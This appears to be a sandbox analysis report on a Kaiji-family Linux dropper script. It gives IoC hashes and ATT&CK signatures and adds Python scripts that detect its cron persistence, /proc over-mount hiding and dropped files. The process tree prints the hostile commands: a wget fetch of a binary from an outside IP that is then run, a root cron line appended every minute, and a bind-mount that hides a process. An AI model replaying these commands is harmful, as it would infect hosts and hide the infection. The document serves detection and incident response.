Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240418-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240418-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    16/04/2025, 18:46

General

  • Target

    download.sh

  • Size

    2KB

  • MD5

    544a2f391e2800bac07e883d902bcc75

  • SHA1

    cea67c26c372d03b795bbba678569256385d3b83

  • SHA256

    1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca

  • SHA512

    f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b

Malware Config

Extracted

Family

kaiji

C2

154.40.47.248:888

Signatures

  • Kaiji 1 IoCs

    Kaiji payload

  • Kaiji family
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 3 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware such as Mirai modifies the hardware watchdog so that it does not restart (reboot) the infected system and interrupt the bot.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Creates/modifies environment variables 1 TTPs 3 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies init.d 2 TTPs 17 IoCs

    Adds/modifies system service, likely for persistence.

  • Write file to user bin folder 2 IoCs
  • Modifies Bash startup script 2 TTPs 3 IoCs
  • Changes its process name 1 IoCs
  • Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs

    Execute scripts via Unix Shell.

  • Enumerates kernel/hardware configuration 1 TTPs 33 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/download.sh
    /tmp/download.sh
    1⤵
    • Executes dropped EXE
    PID:638
    • /bin/uname
      uname -s
      2⤵
        PID:639
      • /bin/uname
        uname -m
        2⤵
          PID:641
        • /bin/rm
          rm -f linux_arm7
          2⤵
            PID:644
          • /usr/bin/wget
            wget -t 1 http://154.40.47.248:8000/linux_arm7
            2⤵
            • Writes file to tmp directory
            PID:648
          • /bin/chmod
            chmod +x linux_arm7
            2⤵
            • File and Directory Permissions Modification
            PID:714
          • /tmp/linux_arm7
            ./linux_arm7
            2⤵
            • Executes dropped EXE
            • Enumerates kernel/hardware configuration
            PID:715
            • /tmp/linux_arm7
              ./linux_arm7 " "
              3⤵
              • Modifies Watchdog functionality
              • Creates/modifies environment variables
              • Modifies init.d
              • Write file to user bin folder
              • Modifies Bash startup script
              • Changes its process name
              • Enumerates kernel/hardware configuration
              • Reads runtime system information
              PID:720
              • /bin/sh
                /bin/sh -c "/etc/32676&"
                4⤵
                • Executes dropped EXE
                • Command and Scripting Interpreter: Unix Shell
                PID:725
              • /usr/sbin/service
                service crond start
                4⤵
                  PID:728
                  • /usr/bin/basename
                    basename /usr/sbin/service
                    5⤵
                      PID:729
                    • /usr/bin/basename
                      basename /usr/sbin/service
                      5⤵
                        PID:731
                      • /bin/systemctl
                        systemctl --quiet is-active multi-user.target
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:732
                      • /bin/sed
                        sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                        5⤵
                          PID:735
                        • /bin/systemctl
                          systemctl list-unit-files --full "--type=socket"
                          5⤵
                          • Enumerates kernel/hardware configuration
                          PID:734
                        • /bin/systemctl
                          systemctl -p Triggers show dbus.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:736
                        • /bin/systemctl
                          systemctl -p Triggers show ssh.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:737
                        • /bin/systemctl
                          systemctl -p Triggers show syslog.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:738
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-fsckd.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:739
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-initctl.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:740
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-journald-audit.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          PID:743
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-journald-dev-log.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:745
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-journald.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:747
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-networkd.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:749
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-rfkill.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:751
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-udevd-control.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:754
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-udevd-kernel.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:756
                      • /usr/local/sbin/systemctl
                        systemctl start crond.service
                        4⤵
                          PID:728
                        • /usr/local/bin/systemctl
                          systemctl start crond.service
                          4⤵
                            PID:728
                          • /usr/sbin/systemctl
                            systemctl start crond.service
                            4⤵
                              PID:728
                            • /usr/bin/systemctl
                              systemctl start crond.service
                              4⤵
                                PID:728
                              • /sbin/systemctl
                                systemctl start crond.service
                                4⤵
                                  PID:728
                                • /bin/systemctl
                                  systemctl start crond.service
                                  4⤵
                                  • Enumerates kernel/hardware configuration
                                  • Reads runtime system information
                                  PID:728
                                • /bin/sh
                                  /bin/sh -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
                                  4⤵
                                  • Creates/modifies Cron job
                                  • Command and Scripting Interpreter: Unix Shell
                                  PID:762
                                • /usr/bin/renice
                                  renice -20 720
                                  4⤵
                                    PID:766
                                  • /bin/mount
                                    mount -o bind /tmp/ /proc/720
                                    4⤵
                                    • Reads runtime system information
                                    PID:768
                                  • /usr/sbin/service
                                    service cron start
                                    4⤵
                                      PID:769
                                      • /usr/bin/basename
                                        basename /usr/sbin/service
                                        5⤵
                                          PID:770
                                        • /usr/bin/basename
                                          basename /usr/sbin/service
                                          5⤵
                                            PID:771
                                          • /bin/systemctl
                                            systemctl --quiet is-active multi-user.target
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:772
                                          • /bin/sed
                                            sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                                            5⤵
                                            • Reads runtime system information
                                            PID:775
                                          • /bin/systemctl
                                            systemctl list-unit-files --full "--type=socket"
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:774
                                          • /bin/systemctl
                                            systemctl -p Triggers show dbus.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:778
                                          • /bin/systemctl
                                            systemctl -p Triggers show ssh.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:779
                                          • /bin/systemctl
                                            systemctl -p Triggers show syslog.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:780
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-fsckd.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:781
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-initctl.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:782
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-journald-audit.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            PID:784
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-journald-dev-log.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:785
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-journald.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:786
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-networkd.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:787
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-rfkill.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:789
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-udevd-control.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:790
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-udevd-kernel.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:791
                                        • /usr/local/sbin/systemctl
                                          systemctl start cron.service
                                          4⤵
                                            PID:769
                                          • /usr/local/bin/systemctl
                                            systemctl start cron.service
                                            4⤵
                                              PID:769
                                            • /usr/sbin/systemctl
                                              systemctl start cron.service
                                              4⤵
                                                PID:769
                                              • /usr/bin/systemctl
                                                systemctl start cron.service
                                                4⤵
                                                  PID:769
                                                • /sbin/systemctl
                                                  systemctl start cron.service
                                                  4⤵
                                                    PID:769
                                                  • /bin/systemctl
                                                    systemctl start cron.service
                                                    4⤵
                                                    • Enumerates kernel/hardware configuration
                                                    • Reads runtime system information
                                                    PID:769
                                                  • /bin/systemctl
                                                    systemctl start crond.service
                                                    4⤵
                                                    • Enumerates kernel/hardware configuration
                                                    • Reads runtime system information
                                                    PID:792
                                              • /bin/rm
                                                /bin/rm /tmp/download.sh
                                                2⤵
                                                  PID:721
                                              • /etc/32676
                                                /etc/32676
                                                1⤵
                                                  PID:727
                                                  • /bin/sleep
                                                    sleep 60
                                                    2⤵
                                                      PID:730
                                                    • /bin/sleep
                                                      sleep 60
                                                      2⤵
                                                        PID:830
                                                      • /bin/sleep
                                                        sleep 60
                                                        2⤵
                                                          PID:854
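The Signatures list and the process tree above record two actions worth hunting for on other hosts: the payload appending `*/1 * * * * root /.mod` to /etc/crontab (PID 762), and `mount -o bind /tmp/ /proc/720` (PID 768) over its own PID directory, which makes the running process vanish from ps, top and anything else that walks /proc. The following Python is an added example written for this page, not code from the report or from the Kaiji sample. The /proc/mounts and /etc/crontab excerpts are constructed, and the cron heuristics (hidden file, unusual location, root every minute) are the editor's choice, not something the report states.

```python
from __future__ import annotations
import re

# Constructed /proc/mounts excerpt modelling the effect of
# `mount -o bind /tmp/ /proc/720` from the process tree. A bind mount is
# listed with its source filesystem type, not the word "bind", so the
# check keys on the mountpoint rather than on the mount options.
SAMPLE_MOUNTS = """\
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/root / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
tmpfs /proc/720 tmpfs rw,nosuid,nodev 0 0
"""

# Constructed /etc/crontab after the payload ran
# /bin/sh -c 'echo "*/1 * * * * root /.mod " >> /etc/crontab'.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/1 * * * * root /.mod 
"""

PROC_PID_MOUNT = re.compile(r"^/proc/\d+(?:/.*)?$")


def find_proc_overmounts(mounts_text: str) -> list[tuple[str, str, str]]:
    """Return (source, mountpoint, fstype) for every mount placed inside a
    /proc/<pid> directory. Only procfs belongs under /proc; anything mounted
    over a PID directory shadows that process's stat/status entries, so ps,
    top and /proc-walking agents no longer see it."""
    hits = []
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        source, mountpoint, fstype = fields[:3]
        mountpoint = mountpoint.replace("\\040", " ")  # /proc/mounts escapes spaces
        if PROC_PID_MOUNT.match(mountpoint):
            hits.append((source, mountpoint, fstype))
    return hits


# System crontab format: five schedule fields, a user, then the command.
SYSTEM_CRON_LINE = re.compile(r"^(?P<sched>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")


def suspicious_cron_entries(crontab_text: str) -> list[dict]:
    """Heuristically flag /etc/crontab entries whose program is a hidden file,
    sits directly under / or in /tmp, /dev/shm or /etc, or runs as root every
    minute. Each hit carries the matching reasons so an analyst can triage."""
    flagged = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        m = SYSTEM_CRON_LINE.match(line)
        if not m:
            continue
        minute = m.group("sched").split()[0]
        cmd = m.group("cmd")
        program = cmd.split()[0]
        reasons = []
        if re.search(r"(^|/)\.[^/]", program):
            reasons.append("hidden file")
        if re.fullmatch(r"/[^/]+", program) or program.startswith(("/tmp/", "/dev/shm/", "/etc/")):
            reasons.append("unusual location")
        if minute in ("*", "*/1") and m.group("user") == "root":
            reasons.append("root, every minute")
        if reasons:
            flagged.append({"line": line, "cmd": cmd, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    print("sample mounts:", find_proc_overmounts(SAMPLE_MOUNTS))
    print("sample crontab:", suspicious_cron_entries(SAMPLE_CRONTAB))
    # On a live host, point the same checks at the real files.
    for path, check in (("/proc/mounts", find_proc_overmounts),
                        ("/etc/crontab", suspicious_cron_entries)):
        try:
            with open(path) as f:
                live = check(f.read())
        except OSError as err:
            print(f"{path}: {err}")
            continue
        print(path, live or "clean")
```

Run it as root on a suspect host to read the real /proc/mounts and /etc/crontab. The over-mount leaves a second trace without this script: the PID directory still appears in `ls /proc`, but ps skips it because /proc/720/stat is gone, so a numeric-directory count from `ls /proc` exceeding the process count from `ps -e` (allowing for processes that exit between the two commands) points at the same hiding technique.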

Network

MITRE ATT&CK Enterprise v16

Downloads

  • /.mod
    Filesize: 34B
    MD5: f5a3713282e43c200f30342f5ff5e2ea
    SHA1: 2b2ce1a207e2b691a074c6f78f71c4785aae426a
    SHA256: 6ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511
    SHA512: 5bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013

  • /etc/.walk
    Filesize: 41B
    MD5: dc6394a4d22242b33f9d43a96ffe3502
    SHA1: 54824f7e446db91a6670d0d552d0ff41d767e9d1
    SHA256: e922d8377bf3bf26579efe87cdda038e2f10c5e597b2aba7677bc921bd848215
    SHA512: 1ea735fd1abaf67eecadec35a04763a836fe11674d38976ef076883207d1708097e0dd8371e91c30a8fa2c0525da0dc2ba703b30497b279c0206e6ffcb88dd0d

  • /etc/.walk
    Filesize: 90B
    MD5: 6179c060af048542f9426ec07bd2d841
    SHA1: ab4421ac24e1481d4334862e7ceb979144d3535a
    SHA256: c742581cef7f919ce2516918c50022ad11da00889fff78bceed7d36f456c1b45
    SHA512: 2ebf226a7c6e8cf252bd216036ea983fb67ba244d9a2bdb5c8d202e80a5a6feeb5d6915def4be9894d0b6acdbb85ad0177a9aac7cb2e819d340b5bb316d2c00f

  • /etc/32676
    Filesize: 56B
    MD5: 585f408444cbca746945f0cb63f2c3f0
    SHA1: 0e44bae17174f04514e770ca7fc4bec1007e39cd
    SHA256: ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299
    SHA512: 022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596

  • /etc/profile.d/gateway.sh
    Filesize: 911B
    MD5: 522cadedcca724421b27f68657bd69b0
    SHA1: b42741c0734f3662d0a0c2690b7ef6414bcda4e0
    SHA256: 836cd5eee60bdb3444bc37e4a3a4db97791b55f86f7e416718c909522a93ebe8
    SHA512: 1ce9b1814deb5a51f6945739c66207ba2eea139b567073e4e9c63eeedf37c327f4ac87f8adc0db6eb96a483e2621d13e663e492e2d71191537e807b38e2c9b35

  • /tmp/linux_arm7
    Filesize: 2.0MB
    MD5: 9c069085ca52a2acca2bf52f1171a7da
    SHA1: 5c6a4714a083dcb6a44adb2043705d65a4ec61ad
    SHA256: 1934d283e13ddcbe0c1c85e4d41d7c27a1261b0f0d9302451b042952e2708a3e
    SHA512: 07a87d09d1711c23b95a904d47aa003dfca41fde7af2b3e220bf1dc8f4a4ae4c4ddb2394150652ac50afde4810250418172fdeb7859a664751be5e80354e5034

  • /usr/bin/include/find
    Filesize: 134KB
    MD5: 138a27d6fe52fa1132760a4fa48922e0
    SHA1: e0250e4d7bf33a5a1064344224148b889cb15138
    SHA256: 81a10dad907b23521461bd3fc83c2cedb2218933a328d9a05e3c9f6a9a1d42aa
    SHA512: ee0078afad63fc2aaffdebb7127d1c7d4459287fee75358f57c82d397c39b7bf64338fb6996dfb1747cd9a896d714b3c76f0948727be91550f1affa1c0298a9e
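The dropped files above give a path-and-hash IoC set for this run. The following Python sweep is an added example for this page, not the report's or the sample's code: it walks a root (a live `/` or a mounted disk image), hashes regular files, matches them against the SHA256 values listed here, and also flags the two naming patterns this sample used under /etc (a bare numeric filename like /etc/32676 and a hidden file like /etc/.walk). Those two pattern rules are the editor's heuristics, and the demo tree the block builds holds constructed contents rather than the real dropped files, so on it only the path-based rules fire; the hash path is exercised by feeding the scanner a digest computed from one of the constructed files.

```python
from __future__ import annotations
import hashlib
import os
import re
import tempfile
from pathlib import Path

# SHA256 values and paths of the files listed under Downloads, plus the
# submitted download.sh from the General section of this report.
KAIJI_SHA256 = {
    "1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca": "download.sh",
    "6ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511": "/.mod",
    "e922d8377bf3bf26579efe87cdda038e2f10c5e597b2aba7677bc921bd848215": "/etc/.walk (41B)",
    "c742581cef7f919ce2516918c50022ad11da00889fff78bceed7d36f456c1b45": "/etc/.walk (90B)",
    "ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299": "/etc/32676",
    "836cd5eee60bdb3444bc37e4a3a4db97791b55f86f7e416718c909522a93ebe8": "/etc/profile.d/gateway.sh",
    "1934d283e13ddcbe0c1c85e4d41d7c27a1261b0f0d9302451b042952e2708a3e": "/tmp/linux_arm7",
    "81a10dad907b23521461bd3fc83c2cedb2218933a328d9a05e3c9f6a9a1d42aa": "/usr/bin/include/find",
}
KAIJI_PATHS = {"/.mod", "/etc/.walk", "/etc/profile.d/gateway.sh",
               "/usr/bin/include/find", "/tmp/linux_arm7"}
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}  # pseudo-filesystems on a live host


def sha256_file(path: Path, chunk: int = 1 << 16) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_root(root: str | os.PathLike, ioc_hashes: dict[str, str] = KAIJI_SHA256,
              ioc_paths: set[str] = KAIJI_PATHS, max_hash_bytes: int = 16 << 20) -> list[dict]:
    """Walk `root` and report files matching a known hash, a known dropped
    path, or the naming patterns this sample used in /etc (editor's heuristic:
    a bare numeric file or a hidden file directly under /etc). Paths are
    reported relative to `root` with a leading slash."""
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root).as_posix()
        rel_dir = "" if rel_dir == "." else "/" + rel_dir
        if rel_dir in SKIP_DIRS:
            dirnames[:] = []
            continue
        for name in filenames:
            rel = f"{rel_dir}/{name}"
            full = Path(dirpath) / name
            reasons = []
            if rel in ioc_paths:
                reasons.append("known dropped path")
            if re.fullmatch(r"/etc/\d+", rel):
                reasons.append("bare numeric file in /etc")
            if re.fullmatch(r"/etc/\.[^/]+", rel):
                reasons.append("hidden file directly in /etc")
            try:
                if full.is_file() and not full.is_symlink() and full.stat().st_size <= max_hash_bytes:
                    digest = sha256_file(full)
                    if digest in ioc_hashes:
                        reasons.append(f"sha256 matches {ioc_hashes[digest]}")
            except OSError:
                pass  # unreadable or vanished; any path-based reasons still stand
            if reasons:
                findings.append({"path": rel, "reasons": reasons})
    return findings


def build_constructed_root() -> Path:
    """Create a throwaway tree imitating the dropped-file layout with
    constructed contents (not the real dropped files) for offline testing."""
    root = Path(tempfile.mkdtemp(prefix="kaiji-demo-"))
    (root / "etc" / "profile.d").mkdir(parents=True)
    (root / "usr" / "bin" / "include").mkdir(parents=True)
    (root / ".mod").write_text("#!/bin/sh\n# constructed stand-in\n")
    (root / "etc" / ".walk").write_text("constructed\n")
    (root / "etc" / "32676").write_text("constructed\n")
    (root / "etc" / "profile.d" / "gateway.sh").write_text("# constructed\n")
    (root / "usr" / "bin" / "include" / "find").write_bytes(b"\x7fELF constructed\n")
    (root / "etc" / "hostname").write_text("benign-host\n")  # should not be flagged
    return root


if __name__ == "__main__":
    demo = build_constructed_root()
    for finding in scan_root(demo):
        print(finding["path"], "->", ", ".join(finding["reasons"]))
```

Against a live system call `scan_root("/")` as root; against a disk image, mount it read-only and pass the mount point. The hash match is the only rule that survives a rename, so keep the path and pattern rules as triage hints rather than verdicts.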